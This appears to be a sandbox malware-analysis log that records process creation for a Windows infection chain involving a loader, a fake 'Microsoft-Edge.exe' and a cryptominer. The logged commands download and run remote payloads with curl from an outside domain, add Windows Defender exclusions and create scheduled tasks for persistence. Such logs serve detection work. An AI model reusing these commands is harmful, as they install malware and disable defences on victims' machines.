Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: unknown	Process created: C:\Windows\System32\services64.exe C:\Windows\system32\services64.exe
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript conf.vbs	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
